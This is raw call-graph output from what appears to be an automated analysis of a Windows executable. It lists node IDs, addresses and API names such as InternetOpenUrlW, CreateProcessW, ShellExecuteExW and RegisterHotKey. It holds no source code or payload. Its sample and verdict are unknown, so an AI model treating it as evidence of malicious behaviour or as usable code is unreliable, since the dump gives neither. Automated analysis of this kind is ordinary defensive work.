AttachThreadInput 242872->242875 242876 1400b2821 242872->242876 242873->242872 242898 1400172d0 94 API calls 242874->242898 242875->242876 242876->242863 242878 1400b282b BringWindowToTop 242876->242878 242878->242863 242879 1400b27bc 242899 1400172d0 94 API calls 242879->242899 242881 1400b27d9 242882 1400b25b0 3 API calls 242881->242882 242883 1400b27e4 242882->242883 242883->242871 242885 140001a70 242884->242885 242886 1400b25e2 GetForegroundWindow 242885->242886 242887 1400b25fa 242886->242887 242888 1400b260d 242886->242888 242887->242859 242889 1400b2612 GetWindow 242888->242889 242890 1400b2625 242888->242890 242889->242890 242890->242859 242892 1400b425e 242891->242892 242893 1400b4266 242891->242893 242892->242867 242894 1400b4270 GetModuleHandleW GetProcAddress 242893->242894 242895 1400b429f 242893->242895 242894->242895 242896 1400b42be SendMessageTimeoutW 242895->242896 242897 1400b42ae 242895->242897 242896->242867 242897->242867 242898->242879 242899->242881 242900 140056a71 242901 140056a7a 242900->242901 242902 140056aab GetCurrentProcessId EnumWindows 242900->242902 242903 140056a97 CloseClipboard 242901->242903 242904 140056a83 GlobalUnlock 242901->242904 242905 140056ada 242902->242905 242907 140056880 242902->242907 242903->242902 242904->242903 242906 1400b2650 110 API calls 242905->242906 242908 140056af0 242906->242908 242908->242907 242909 140056af8 SetTimer 242908->242909 242909->242907 242910 140036397 242922 14007e490 242910->242922 242912 140032601 GetTickCount 242915 140032620 PeekMessageW 242912->242915 242920 1400325c7 242912->242920 242913 1400325da GlobalUnlock 242914 1400325ee CloseClipboard 242913->242914 242914->242912 242916 140032649 GetTickCount 242915->242916 242915->242920 242916->242920 242917 140032701 GetTickCount 242917->242920 242918 14008a1a0 172 API calls 242918->242920 242919 140032520 172 API calls 242919->242920 242920->242912 242920->242913 242920->242914 242920->242916 242920->242917 242920->242918 242920->242919 242921 140038ac5 242920->242921 242924 14007e4c0 242922->242924 242923 14007e550 InternetOpenW 242925 14007e577 InternetOpenUrlW 242923->242925 242926 14007e5a3 242923->242926 242924->242923 242994 1400148a0 65 API calls 242924->242994 242929 14007e5ca 242925->242929 242930 14007e59a InternetCloseHandle 242925->242930 242997 14003f1a0 152 API calls 3 library calls 242926->242997 242963 1400ccdec 242929->242963 242930->242926 242931 14007e4e7 242933 14007e4fe 242931->242933 242934 14007e4ee 242931->242934 242996 1400cbb78 63 API calls _wcstoi64 242933->242996 242995 1400cc670 63 API calls _wcstoi64 242934->242995 242937 14007e5e1 242938 14007e602 242937->242938 242939 14007e5e9 InternetCloseHandle InternetCloseHandle 242937->242939 242940 14007e71e InternetReadFileExA 242938->242940 242943 14007e652 InternetReadFile 242938->242943 242950 14007e801 242939->242950 242942 14007e7d8 InternetCloseHandle InternetCloseHandle 242940->242942 242946 14007e73d 242940->242946 242982 1400cd090 242942->242982 242943->242942 242956 14007e676 242943->242956 242945 14007e5ad 242945->242920 242946->242942 242948 14007e74b GetTickCount 242946->242948 242955 14007e78f GetTickCount 242946->242955 242999 1400ccf84 84 API calls 3 library calls 242946->242999 242948->242946 242951 14007e766 PeekMessageW 242948->242951 242949 14007e7f6 DeleteFileW 242949->242950 243000 14003f1a0 152 API calls 3 library calls 242950->243000 242951->242946 242951->242955 242952 14007e68d GetTickCount 242953 14007e6a8 PeekMessageW 242952->242953 242952->242956 242953->242956 242957 14007e6d1 GetTickCount 242953->242957 242955->242946 242956->242942 242956->242952 242956->242957 242998 1400ccf84 84 API calls 3 library calls 242956->242998 242957->242956 242958 14007e7b1 InternetReadFileExA 242958->242942 242958->242946 242959 14007e4f9 242959->242923 242961 14007e6f5 InternetReadFile 242961->242956 242962 14007e719 242961->242962 242962->242942 242965 1400ccd0c 242963->242965 242964 1400ccd3d 243033 1400ced6c 62 API calls _getptd 242964->243033 242965->242964 242967 1400ccd6f 242965->242967 243001 1400d28f4 242967->243001 242968 1400ccd42 243034 1400ced04 17 API calls _invalid_parameter_noinfo 242968->243034 242980 1400ccd4d 242980->242937 242983 1400cd0c5 242982->242983 242984 1400cd0b1 242982->242984 242993 14007e7f2 242983->242993 243365 1400d2510 242983->243365 243387 1400ced6c 62 API calls _getptd 242984->243387 242986 1400cd0b6 243388 1400ced04 17 API calls _invalid_parameter_noinfo 242986->243388 242993->242949 242993->242950 242994->242931 242995->242959 242996->242959 242997->242945 242998->242961 242999->242958 243000->242945 243038 1400cf364 243001->243038 243033->242968 243034->242980 243037 1400d25a8 LeaveCriticalSection 243039 1400cf382 243038->243039 243040 1400cf393 EnterCriticalSection 243038->243040 243044 1400cf27c 243039->243044 243045 1400cf2ba 243044->243045 243046 1400cf2a3 243044->243046 243048 1400cf2cf 243045->243048 243049 1400cf2d3 243045->243049 243072 1400cf080 62 API calls 2 library calls 243046->243072 243048->243040 243071 1400cafa4 62 API calls 2 library calls 243048->243071 243075 1400d0a70 62 API calls malloc 243049->243075 243050 1400cf2a8 243073 1400cee20 62 API calls 4 library calls 243050->243073 243053 1400cf2dd 243055 1400cf2e5 243053->243055 243056 1400cf2f4 243053->243056 243054 1400cf2b0 243074 1400cac48 GetModuleHandleW GetProcAddress ExitProcess malloc 243054->243074 243076 1400ced6c 62 API calls _getptd 243055->243076 243059 1400cf364 _lock 60 API calls 243056->243059 243061 1400cf2fe 243059->243061 243060 1400cf2ea 243060->243048 243062 1400cf30a InitializeCriticalSectionAndSpinCount 243061->243062 243063 1400cf337 243061->243063 243064 1400cf326 LeaveCriticalSection 243062->243064 243065 1400cf319 243062->243065 243079 1400cb11c 62 API calls 2 library calls 243063->243079 243064->243048 243077 1400cb11c 62 API calls 2 library calls 243065->243077 243069 1400cf321 243078 1400ced6c 62 API calls _getptd 243069->243078 243072->243050 243073->243054 243075->243053 243076->243060 243077->243069 243078->243064 243079->243064 243097 1400ccdc7 243097->243037 243104 1400d77d8 243106 1400ced6c _errno 62 API calls 243104->243106 243110 1400d77dd 243106->243110 243107 1400d77b7 243107->243104 243111 1400d7819 243107->243111 243113 1400ced04 _invalid_parameter_noinfo 17 API calls 243110->243113 243114 1400d7010 _wsopen_s 105 API calls 243111->243114 243117 1400d77e9 243113->243117 243115 1400d7836 243114->243115 243115->243117 243121 1400d7b94 _fflush_nolock LeaveCriticalSection 243115->243121 243117->243097 243174 1400d7b94 LeaveCriticalSection 243117->243174 243121->243117 243366 1400d2525 243365->243366 243367 1400d2563 EnterCriticalSection 243365->243367 243366->243367 243368 1400d2531 243366->243368 243369 1400cf364 _lock 62 API calls 243368->243369 243370 1400cd0d6 243369->243370 243371 1400cd014 243370->243371 243372 1400cd03d 243371->243372 243373 1400cd029 243371->243373 243375 1400cd039 243372->243375 243390 1400d332c 243372->243390 243396 1400ced6c 62 API calls _getptd 243373->243396 243389 1400d25a8 LeaveCriticalSection 243375->243389 243376 1400cd02e 243397 1400ced04 17 API calls _invalid_parameter_noinfo 243376->243397 243381 1400cd052 243399 1400d3304 243381->243399 243385 1400cd061 243385->243375 243406 1400cb11c 62 API calls 2 library calls 243385->243406 243387->242986 243388->242993 243391 1400d3349 243390->243391 243392 1400cd048 243390->243392 243391->243392 243393 1400d3304 _fileno 62 API calls 243391->243393 243398 1400d366c 62 API calls free 243392->243398 243394 1400d3360 243393->243394 243395 1400d3224 _flush 82 API calls 243394->243395 243395->243392 243396->243376 243397->243375 243398->243381 243400 1400d330d 243399->243400 243404 1400cd05a 243399->243404 243407 1400ced6c 62 API calls _getptd 243400->243407 243402 1400d3312 243408 1400ced04 17 API calls _invalid_parameter_noinfo 243402->243408 243405 1400d35a8 68 API calls 5 library calls 243404->243405 243405->243385 243406->243375 243407->243402 243408->243404 243409 14002e63c 243411 14002e646 243409->243411 243410 14002e662 243429 14002e74a __initmbctable 243410->243429 243430 14002ec40 243410->243430 243411->243410 243414 1400ad210 89 API calls 243411->243414 243414->243410 243415 14002e791 243434 1400aa340 243415->243434 243417 14002e704 243417->243429 243440 14002e290 243417->243440 243419 14002e6fc 243419->243415 243419->243417 243421 14002e7e2 243423 14002e80c __initmbctable 243421->243423 243425 1400aa490 73 API calls 243421->243425 243421->243429 243422 14002e7a3 243422->243421 243422->243429 243456 1400aa490 243422->243456 243426 14002e958 243423->243426 243428 1400ca9a4 malloc 62 API calls 243423->243428 243423->243429 243425->243423 243426->243429 243461 1400cbb84 65 API calls 4 library calls 243426->243461 243428->243426 243433 14002ec61 243430->243433 243431 14002e6d8 243431->243415 243431->243417 243439 1400ca91c 62 API calls 2 library calls 243431->243439 243433->243431 243462 1400ca91c 62 API calls 2 library calls 243433->243462 243435 1400aa359 243434->243435 243436 1400aa3e5 243434->243436 243435->243436 243463 1400aa400 243435->243463 243436->243422 243438 1400aa392 __initmbctable 243438->243422 243439->243419 243442 14002e2c5 wcsncpy 243440->243442 243455 14002e2b9 243440->243455 243445 14002e399 243442->243445 243442->243455 243469 1400ca91c 62 API calls 2 library calls 243442->243469 243444 14002e414 243446 14002e464 243444->243446 243447 14002e4a0 243444->243447 243444->243455 243445->243444 243445->243455 243470 1400ca91c 62 API calls 2 library calls 243445->243470 243448 14002e290 62 API calls 243446->243448 243449 14002e4be 243447->243449 243454 14002e4e9 243447->243454 243448->243455 243451 14002e290 62 API calls 243449->243451 243450 14002e51e 243453 14002e290 62 API calls 243450->243453 243450->243455 243451->243455 243453->243455 243454->243450 243454->243455 243471 1400ca91c 62 API calls 2 library calls 243454->243471 243455->243429 243472 1400cbd40 243456->243472 243459 1400ca9a4 malloc 62 API calls 243460 1400aa4ba _RunAllParam 243459->243460 243460->243421 243461->243429 243462->243433 243464 1400aa415 243463->243464 243467 1400aa442 243463->243467 243465 1400aa424 243464->243465 243466 1400aa490 73 API calls 243464->243466 243465->243467 243468 1400aa490 73 API calls 243465->243468 243466->243465 243467->243438 243468->243467 243469->243442 243470->243445 243471->243454 243474 1400cbd4b 243472->243474 243473 1400ca9a4 malloc 62 API calls 243473->243474 243474->243473 243475 1400aa4a0 243474->243475 243478 1400cbd6a 243474->243478 243484 1400cf124 DecodePointer 243474->243484 243475->243459 243475->243460 243477 1400cbdbb 243488 1400d105c 62 API calls std::exception::operator= 243477->243488 243478->243477 243485 1400cb2ac 243478->243485 243480 1400cbdcc 243489 1400d1130 RaiseException __initmbctable 243480->243489 243483 1400cbde2 243484->243474 243490 1400cb1a0 243485->243490 243487 1400cb2b5 243487->243477 243488->243480 243489->243483 243505 1400cac60 243490->243505 243492 1400cb1c1 DecodePointer DecodePointer 243493 1400cb1eb 243492->243493 243496 1400cb286 _cinit 243492->243496 243494 1400cd83c _cinit 63 API calls 243493->243494 243493->243496 243495 1400cb207 243494->243495 243497 1400cb264 EncodePointer EncodePointer 243495->243497 243498 1400cb223 243495->243498 243500 1400cb234 243495->243500 243496->243487 243497->243496 243499 1400d0b74 _cinit 66 API calls 243498->243499 243503 1400cb22b 243499->243503 243500->243496 243500->243503 243501 1400d0b74 _cinit 66 API calls 243504 1400cb247 243501->243504 243502 1400cb24c EncodePointer 243502->243497 243503->243500 243503->243501 243503->243502 243504->243496 243504->243502 243506 140041b60 243507 140041b7a _wcsupr_s_l 243506->243507 243509 140041bc5 243507->243509 243567 14001c090 94 API calls _wcsupr_s_l 243507->243567 243510 140041c11 243509->243510 243513 140041ca2 _wcsupr_s_l __initmbctable 243509->243513 243538 140041e1a 243509->243538 243568 1400ca91c 62 API calls 2 library calls 243510->243568 243512 140041c20 243540 140041c7f _fltin2 _wcsupr_s_l 243512->243540 243569 1400ca91c 62 API calls 2 library calls 243512->243569 243513->243540 243574 1400ca91c 62 API calls 2 library calls 243513->243574 243515 140041c33 243515->243540 243570 1400ca91c 62 API calls 2 library calls 243515->243570 243517 140041c46 243517->243540 243571 1400ca91c 62 API calls 2 library calls 243517->243571 243520 140042379 243525 1400423a2 FormatMessageW 243520->243525 243520->243538 243521 140041d36 243521->243540 243575 1400ca91c 62 API calls 2 library calls 243521->243575 243522 140041c59 243522->243540 243572 1400ca91c 62 API calls 2 library calls 243522->243572 243527 1400423d6 243525->243527 243528 1400423ee 243525->243528 243526 140041d49 243526->243540 243576 1400ca91c 62 API calls 2 library calls 243526->243576 243531 1400ad210 89 API calls 243527->243531 243536 1400ad210 89 API calls 243528->243536 243529 140041c6c 243529->243540 243573 1400ca91c 62 API calls 2 library calls 243529->243573 243530 140042098 _fltin2 243530->243520 243556 140042108 _wcsupr_s_l 243530->243556 243582 1400ca91c 62 API calls 2 library calls 243530->243582 243531->243528 243534 14004218a 243539 1400422a7 ShellExecuteExW 243534->243539 243536->243538 243537 140041d5c 243537->243540 243577 1400ca91c 62 API calls 2 library calls 243537->243577 243543 1400422c1 243539->243543 243544 14004236e GetLastError 243539->243544 243540->243530 243540->243538 243545 140041f51 _wcsupr_s_l 243540->243545 243580 1400cafcc 89 API calls 4 library calls 243540->243580 243549 1400422cc GetModuleHandleW GetProcAddress 243543->243549 243558 14004206a 243543->243558 243544->243520 243547 140041fae 243545->243547 243548 14004201f CreateProcessW 243545->243548 243546 140041d6f 243546->243540 243578 1400ca91c 62 API calls 2 library calls 243546->243578 243581 14007a5a0 6 API calls _fltin2 243547->243581 243551 140042090 GetLastError 243548->243551 243552 14004205b 243548->243552 243549->243558 243551->243530 243553 140042064 CloseHandle 243552->243553 243552->243558 243553->243558 243555 140042004 243555->243530 243555->243538 243555->243558 243556->243534 243559 1400421ba SetCurrentDirectoryW 243556->243559 243565 1400421c3 243556->243565 243557 140041d82 243557->243540 243579 1400ca91c 62 API calls 2 library calls 243557->243579 243558->243538 243561 140042360 CloseHandle 243558->243561 243559->243565 243561->243538 243562 14004226c 243562->243539 243563 14004229b SetCurrentDirectoryW 243562->243563 243563->243539 243564 14004223c GetFileAttributesW 243564->243562 243566 140042249 243564->243566 243565->243562 243565->243564 243566->243565 243567->243509 243568->243512 243569->243515 243570->243517 243571->243522 243572->243529 243573->243540 243574->243521 243575->243526 243576->243537 243577->243546 243578->243557 243579->243540 243580->243545 243581->243555 243582->243556 243583 140001abc 243584 140001ac7 243583->243584 243585 140001ae6 GlobalUnlock 243584->243585 243586 140001afa CloseClipboard 243584->243586 243587 140001b0d 243584->243587 243585->243586 243586->243587 243588 140001b58 243587->243588 243642 140004570 joyGetPosEx PostMessageW 243587->243642 243590 140001b68 243588->243590 243591 140001b7c 243588->243591 243643 140004220 157 API calls 2 library calls 243590->243643 243594 140001b98 SetTimer 243591->243594 243629 140001bbc 243591->243629 243593 140001b6d 243593->243591 243594->243629 243595 140001c7d GetTickCount 243595->243629 243596 140001d05 GetMessageW 243596->243595 243597 140001d2a GetTickCount 243596->243597 243597->243629 243598 140001cd8 GetTickCount 243598->243629 243635 140001cf3 wcsncpy 243598->243635 243600 140002140 GetFocus 243600->243629 243601 140002a03 GetForegroundWindow 243603 140002a15 GetWindowThreadProcessId 243601->243603 243605 140002a2c GetClassNameW 243603->243605 243604 140002533 IsDialogMessageW 243604->243629 243608 140002a5e IsDialogMessageW 243605->243608 243607 1400026aa ShowWindow 243607->243629 243608->243629 243609 14000218b TranslateAcceleratorW 243609->243629 243611 140002aae SetCurrentDirectoryW 243611->243629 243614 1400024ae SendMessageW 243614->243629 243615 1400019f0 GetDlgCtrlID GetParent GetDlgCtrlID 243615->243629 243616 1400024ca SendMessageW 243616->243629 243617 14000408e 243620 140004103 243617->243620 243625 1400040df KillTimer 243617->243625 243618 140002388 GetKeyState 243619 14000239f GetKeyState 243618->243619 243618->243629 243619->243629 243621 14000246c PostMessageW 243621->243635 243622 14000226f GetKeyState 243622->243629 243623 1400023f1 GetWindowLongW 243626 140002409 SendMessageW 243623->243626 243623->243629 243624 14000242f SendMessageW 243624->243629 243625->243620 243626->243629 243627 140002299 GetWindowLongW 243627->243629 243628 14000230a IsWindowEnabled 243628->243629 243629->243595 243629->243596 243629->243598 243629->243600 243629->243601 243629->243604 243629->243607 243629->243609 243629->243611 243629->243614 243629->243615 243629->243616 243629->243618 243629->243621 243629->243622 243629->243623 243629->243624 243629->243627 243629->243628 243630 1400030d0 DragFinish 243629->243630 243631 140002328 GetKeyState 243629->243631 243629->243635 243645 1400b41f0 GetWindowLongW GetParent GetWindowLongW 243629->243645 243646 14008bf90 GetWindowLongW GetParent 243629->243646 243647 140004570 joyGetPosEx PostMessageW 243629->243647 243630->243629 243631->243635 243632 14009e890 191 API calls 243632->243635 243634 14000319a GetTickCount 243634->243635 243635->243617 243635->243629 243635->243632 243635->243634 243644 140004710 162 API calls 3 library calls 243635->243644 243648 140004220 157 API calls 2 library calls 243635->243648 243649 1400041a0 GetTickCount 243635->243649 243650 140001820 116 API calls 243635->243650 243651 1400049d0 SetCurrentDirectoryW GetTickCount LoadImageW Shell_NotifyIconW __initmbctable 243635->243651 243637 140003240 GetTickCount 243639 14000326b 243637->243639 243639->243595 243652 14000dc20 123 API calls _wcsupr_s_l 243639->243652 243653 140004b20 243639->243653 243681 1400041a0 GetTickCount 243639->243681 243642->243588 243643->243593 243644->243635 243645->243629 243646->243629 243647->243629 243648->243635 243649->243635 243650->243635 243651->243637 243652->243639 243654 140004b42 243653->243654 243658 140004b6d _RunAllParam 243653->243658 243654->243658 243682 1400cb11c 62 API calls 2 library calls 243654->243682 243655 140004bc2 _RunAllParam 243659 140004c11 243655->243659 243660 140004bf4 243655->243660 243656 140004b9d _RunAllParam 243656->243655 243684 1400cb11c 62 API calls 2 library calls 243656->243684 243658->243656 243683 1400cb11c 62 API calls 2 library calls 243658->243683 243664 140004c71 243659->243664 243665 140004c61 243659->243665 243685 1400b14e0 94 API calls 3 library calls 243660->243685 243668 140004ca8 243664->243668 243670 140004cc2 243664->243670 243677 140004c0c __initmbctable 243664->243677 243686 1400060c0 21 API calls 2 library calls 243665->243686 243667 14001f748 243667->243639 243687 1400b1b90 62 API calls free 243668->243687 243671 140004d1c 243670->243671 243670->243677 243680 140004cff 243670->243680 243675 1400aa400 73 API calls 243671->243675 243672 14001f72b Shell_NotifyIconW 243672->243667 243673 14001f701 LoadImageW 243673->243672 243674 14001f6f8 243674->243672 243675->243677 243676 140004e27 243676->243677 243679 1400ca9a4 malloc 62 API calls 243676->243679 243677->243667 243677->243672 243677->243673 243677->243674 243679->243677 243680->243676 243680->243677 243688 1400cb11c 62 API calls 2 library calls 243680->243688 243681->243639 243682->243658 243683->243656 243684->243655 243685->243677 243686->243677 243687->243677 243688->243676 243689 140003f2e 243690 140003f10 243689->243690 243700 140001c03 243689->243700 243744 1400a33d0 119 API calls 3 library calls 243690->243744 243691 140004b20 96 API calls 243691->243700 243693 140001c7d GetTickCount 243693->243700 243694 140001d05 GetMessageW 243694->243693 243695 140001d2a GetTickCount 243694->243695 243695->243700 243696 140001cd8 GetTickCount 243697 140001cf3 wcsncpy 243696->243697 243696->243700 243697->243693 243697->243700 243713 1400041a0 GetTickCount 243697->243713 243717 14000408e 243697->243717 243725 14009e890 191 API calls 243697->243725 243733 14000319a GetTickCount 243697->243733 243737 140004710 162 API calls 3 library calls 243697->243737 243741 140004220 157 API calls 2 library calls 243697->243741 243742 140001820 116 API calls 243697->243742 243743 1400049d0 SetCurrentDirectoryW GetTickCount LoadImageW Shell_NotifyIconW __initmbctable 243697->243743 243745 14000dc20 123 API calls _wcsupr_s_l 243697->243745 243699 140002140 GetFocus 243699->243700 243700->243691 243700->243693 243700->243694 243700->243696 243700->243697 243700->243699 243701 140002a03 GetForegroundWindow 243700->243701 243704 140002533 IsDialogMessageW 243700->243704 243707 1400026aa ShowWindow 243700->243707 243709 14000218b TranslateAcceleratorW 243700->243709 243711 140002aae SetCurrentDirectoryW 243700->243711 243714 1400019f0 GetDlgCtrlID GetParent GetDlgCtrlID 243700->243714 243715 1400024ae SendMessageW 243700->243715 243716 1400024ca SendMessageW 243700->243716 243718 140002388 GetKeyState 243700->243718 243721 14000246c PostMessageW 243700->243721 243722 14000226f GetKeyState 243700->243722 243723 1400023f1 GetWindowLongW 243700->243723 243724 14000242f SendMessageW 243700->243724 243728 140002299 GetWindowLongW 243700->243728 243729 14000230a IsWindowEnabled 243700->243729 243730 1400030d0 DragFinish 243700->243730 243731 140002328 GetKeyState 243700->243731 243738 1400b41f0 GetWindowLongW GetParent GetWindowLongW 243700->243738 243739 14008bf90 GetWindowLongW GetParent 243700->243739 243740 140004570 joyGetPosEx PostMessageW 243700->243740 243703 140002a15 GetWindowThreadProcessId 243701->243703 243705 140002a2c GetClassNameW 243703->243705 243704->243700 243708 140002a5e IsDialogMessageW 243705->243708 243707->243700 243708->243700 243709->243700 243711->243700 243713->243697 243714->243700 243715->243700 243716->243700 243720 140004103 243717->243720 243726 1400040df KillTimer 243717->243726 243718->243700 243719 14000239f GetKeyState 243718->243719 243719->243700 243721->243697 243722->243700 243723->243700 243727 140002409 SendMessageW 243723->243727 243724->243700 243725->243697 243726->243720 243727->243700 243728->243700 243729->243700 243730->243700 243731->243697 243733->243697 243735 140003240 GetTickCount 243735->243697 243737->243697 243738->243700 243739->243700 243740->243700 243741->243697 243742->243697 243743->243735 243744->243700 243745->243697 243746 1400cd974 GetStartupInfoW 243748 1400cd9a3 243746->243748 243786 1400cf0c4 HeapCreate 243748->243786 243749 1400cda0a 243791 1400ce9b0 243749->243791 243752 1400cd9f6 243873 1400cee20 62 API calls 4 library calls 243752->243873 243753 1400cd9f1 243872 1400cf080 62 API calls 2 library calls 243753->243872 243757 1400cda35 _RTC_Initialize 243807 1400d3e4c GetStartupInfoW 243757->243807 243758 1400cda00 243874 1400cac48 GetModuleHandleW GetProcAddress ExitProcess malloc 243758->243874 243759 1400cda1c 243875 1400cf080 62 API calls 2 library calls 243759->243875 243760 1400cda21 243876 1400cee20 62 API calls 4 library calls 243760->243876 243764 1400cda2b 243877 1400cac48 GetModuleHandleW GetProcAddress ExitProcess malloc 243764->243877 243767 1400cda4e GetCommandLineW 243820 1400d3dc4 GetEnvironmentStringsW 243767->243820 243774 1400cda7a 243833 1400d3a04 243774->243833 243777 1400cda8d 243846 1400cad2c 243777->243846 243781 1400cda97 243782 1400cdaa2 _wwincmdln 243781->243782 243881 1400cafa4 62 API calls 2 library calls 243781->243881 243854 140005330 SetErrorMode 243782->243854 243785 1400cdac8 243787 1400cf0ec GetVersion 243786->243787 243788 1400cd9e4 243786->243788 243789 1400cf110 243787->243789 243790 1400cf0f6 HeapSetInformation 243787->243790 243788->243749 243788->243752 243788->243753 243789->243788 243790->243789 243882 1400cac78 243791->243882 243793 1400ce9bb 243886 1400cf158 243793->243886 243796 1400cea24 243891 1400ce6f4 65 API calls free 243796->243891 243797 1400ce9c4 FlsAlloc 243797->243796 243799 1400ce9dc 243797->243799 243800 1400d0af0 __onexitinit 62 API calls 243799->243800 243802 1400ce9eb 243800->243802 243801 1400cda0f 243801->243757 243801->243759 243801->243760 243802->243796 243803 1400ce9f3 FlsSetValue 243802->243803 243803->243796 243804 1400cea06 243803->243804 243890 1400ce71c 62 API calls 3 library calls 243804->243890 243806 1400cea10 GetCurrentThreadId 243806->243801 243808 1400d0af0 __onexitinit 62 API calls 243807->243808 243810 1400d3e82 243808->243810 243809 1400cda40 243809->243767 243878 1400cafa4 62 API calls 2 library calls 243809->243878 243810->243809 243811 1400d4034 243810->243811 243814 1400d0af0 __onexitinit 62 API calls 243810->243814 243816 1400d3fa9 243810->243816 243812 1400d4059 GetStdHandle 243811->243812 243813 1400d4089 GetFileType 243811->243813 243815 1400d40f2 SetHandleCount 243811->243815 243817 1400d40b3 InitializeCriticalSectionAndSpinCount 243811->243817 243812->243811 243813->243811 243814->243810 243815->243809 243816->243811 243818 1400d3fe2 InitializeCriticalSectionAndSpinCount 243816->243818 243819 1400d3fd4 GetFileType 243816->243819 243817->243809 243817->243811 243818->243809 243818->243816 243819->243816 243819->243818 243821 1400cda60 243820->243821 243823 1400d3de8 243820->243823 243827 1400d3cd4 GetModuleFileNameW 243821->243827 243893 1400d0a70 62 API calls malloc 243823->243893 243825 1400d3e28 FreeEnvironmentStringsW 243825->243821 243826 1400d3e0f __initmbctable 243826->243825 243828 1400d3d14 __wsetargv 243827->243828 243829 1400cda6c 243828->243829 243830 1400d3d6f 243828->243830 243829->243774 243879 1400cafa4 62 API calls 2 library calls 243829->243879 243894 1400d0a70 62 API calls malloc 243830->243894 243832 1400d3d74 __wsetargv 243832->243829 243834 1400cda7f 243833->243834 243835 1400d3a37 _FF_MSGBANNER 243833->243835 243834->243777 243880 1400cafa4 62 API calls 2 library calls 243834->243880 243836 1400d0af0 __onexitinit 62 API calls 243835->243836 243843 1400d3a64 _FF_MSGBANNER 243836->243843 243837 1400d3acc 243896 1400cb11c 62 API calls 2 library calls 243837->243896 243839 1400d0af0 __onexitinit 62 API calls 243839->243843 243840 1400d3b20 243897 1400cb11c 62 API calls 2 library calls 243840->243897 243843->243834 243843->243837 243843->243839 243843->243840 243844 1400d3b0c 243843->243844 243895 1400d0ddc 62 API calls 2 library calls 243843->243895 243845 1400cec60 _fltout2 16 API calls 243844->243845 243845->243840 243848 1400cad42 _cinit 243846->243848 243898 1400cf6f8 243848->243898 243849 1400cad5f _initterm_e 243850 1400cb2ac _cinit 72 API calls 243849->243850 243852 1400cada5 _cinit 243849->243852 243851 1400cad82 243850->243851 243851->243852 243901 1400df200 243851->243901 243852->243781 243921 140063e00 243854->243921 243857 1400aa340 73 API calls 243858 140005373 __initmbctable 243857->243858 243927 1400053f0 243858->243927 243860 1400053a2 243861 1400053b9 243860->243861 243961 1400200b0 243860->243961 243861->243785 243863 1400053b0 243863->243861 243965 140005690 243863->243965 243867 1400053d3 243867->243861 243988 14000cda0 243867->243988 243871 140005902 243871->243785 243872->243752 243873->243758 243875->243760 243876->243764 243892 1400ce6e8 EncodePointer 243882->243892 243884 1400cac83 _initp_misc_winsig 243885 1400cf3f4 EncodePointer 243884->243885 243885->243793 243887 1400cf17b 243886->243887 243888 1400cf181 InitializeCriticalSectionAndSpinCount 243887->243888 243889 1400ce9c0 243887->243889 243888->243887 243888->243889 243889->243796 243889->243797 243890->243806 243891->243801 243893->243826 243894->243832 243895->243843 243896->243834 243897->243834 243899 1400cf70e EncodePointer 243898->243899 243899->243899 243900 1400cf723 243899->243900 243900->243849 243904 14001e640 243901->243904 243903 1400df209 243905 14001e87b _fltin2 243904->243905 243911 1400a1510 243905->243911 243907 14001e891 243908 14001e958 InitializeCriticalSection OleInitializeWOW 243907->243908 243909 14002e290 62 API calls 243907->243909 243908->243903 243910 14001e8fa 243909->243910 243910->243908 243912 1400a1529 243911->243912 243918 1400a15a3 243911->243918 243913 1400ca9a4 malloc 62 API calls 243912->243913 243912->243918 243915 1400a1561 243913->243915 243914 1400a161e 243914->243907 243915->243914 243916 1400cbd40 73 API calls 243915->243916 243917 1400a159b 243916->243917 243917->243918 243920 1400cb11c 62 API calls 2 library calls 243917->243920 243918->243907 243920->243914 244031 1400d23b0 243921->244031 243924 140063e26 243925 14000534d 243924->243925 244033 140079920 73 API calls 2 library calls 243924->244033 243925->243857 243928 1400054d6 243927->243928 243942 140005418 243927->243942 244034 1400059f0 243928->244034 243930 140005670 243930->243860 243931 1400ca91c 62 API calls 243931->243942 243933 1400054f3 wcsncpy 243933->243930 243935 1400055c3 243933->243935 243936 140005573 243933->243936 244063 1400ca91c 62 API calls 2 library calls 243933->244063 243935->243930 244047 1400a4e20 243935->244047 243936->243935 244064 1400ca91c 62 API calls 2 library calls 243936->244064 243941 140005636 _wcsupr_s_l 243944 14001ed2c GetModuleFileNameW 243941->243944 243942->243928 243942->243931 244061 1400cab74 64 API calls 2 library calls 243942->244061 244062 14001e0f0 67 API calls 243942->244062 243945 14001ed53 243944->243945 243946 14001eda9 243944->243946 243948 14001ed5c 243945->243948 243950 1400aa340 73 API calls 243945->243950 243946->243948 244057 1400ae470 243946->244057 243948->243860 243949 14001edf9 243951 1400aa400 73 API calls 243949->243951 243954 14001ee2d __initmbctable 243949->243954 243952 14001ed71 243950->243952 243951->243954 243952->243946 243952->243948 243953 1400aa340 73 API calls 243952->243953 243953->243946 243955 1400aa340 73 API calls 243954->243955 243956 14001eeb3 243954->243956 243960 14001eee2 __initmbctable 243954->243960 243955->243956 243957 1400aa340 73 API calls 243956->243957 243956->243960 243958 14001eed6 243957->243958 243959 1400aa400 73 API calls 243958->243959 243958->243960 243959->243960 243960->243860 243962 1400200f9 243961->243962 244080 1400207e0 FindResourceW 243962->244080 243964 1400201a7 243964->243863 243966 1400056b4 243965->243966 243967 140005771 243966->243967 243968 14000577e FindWindowW 243966->243968 243969 1400053c5 243966->243969 243971 14000570e FindWindowW 243966->243971 243967->243968 243967->243969 243968->243969 243970 14000576a PostMessageW Sleep IsWindow 243968->243970 243969->243861 243978 140005840 243969->243978 243973 140005811 Sleep 243970->243973 243976 1400057d0 243970->243976 243971->243967 243975 14000572a 243971->243975 243973->243969 243974 1400057f7 Sleep IsWindow 243974->243973 243974->243976 243975->243969 243975->243970 243976->243974 243977 140005836 243976->243977 243977->243969 244104 14001ef90 243978->244104 243980 140005850 243981 140005854 243980->243981 243982 140005859 SystemParametersInfoW 243980->243982 243981->243867 243983 140005893 243982->243983 243984 140005874 243982->243984 243986 1400ca9a4 malloc 62 API calls 243983->243986 243987 1400058b5 _fltin2 243983->243987 243984->243983 243985 14000587d SystemParametersInfoW 243984->243985 243985->243983 243986->243987 243987->243867 243996 14000cde3 _fltin2 _wcsupr_s_l 243988->243996 243990 14000d254 244157 14000a840 243990->244157 243992 14000ce97 UnregisterHotKey 243992->243996 243993 14000cf1e 243993->243990 243994 14000d1f4 UnregisterHotKey 243993->243994 243999 14000d1c0 RegisterHotKey 243993->243999 244217 1400ca91c 62 API calls 2 library calls 243993->244217 243994->243993 243995 14000d2a6 243997 1400058fc 243995->243997 243998 14000d2b8 SetTimer 243995->243998 243996->243992 243996->243993 244216 140006880 62 API calls 243996->244216 244001 14001f770 243997->244001 243998->243997 243999->243993 244002 1400ca9a4 malloc 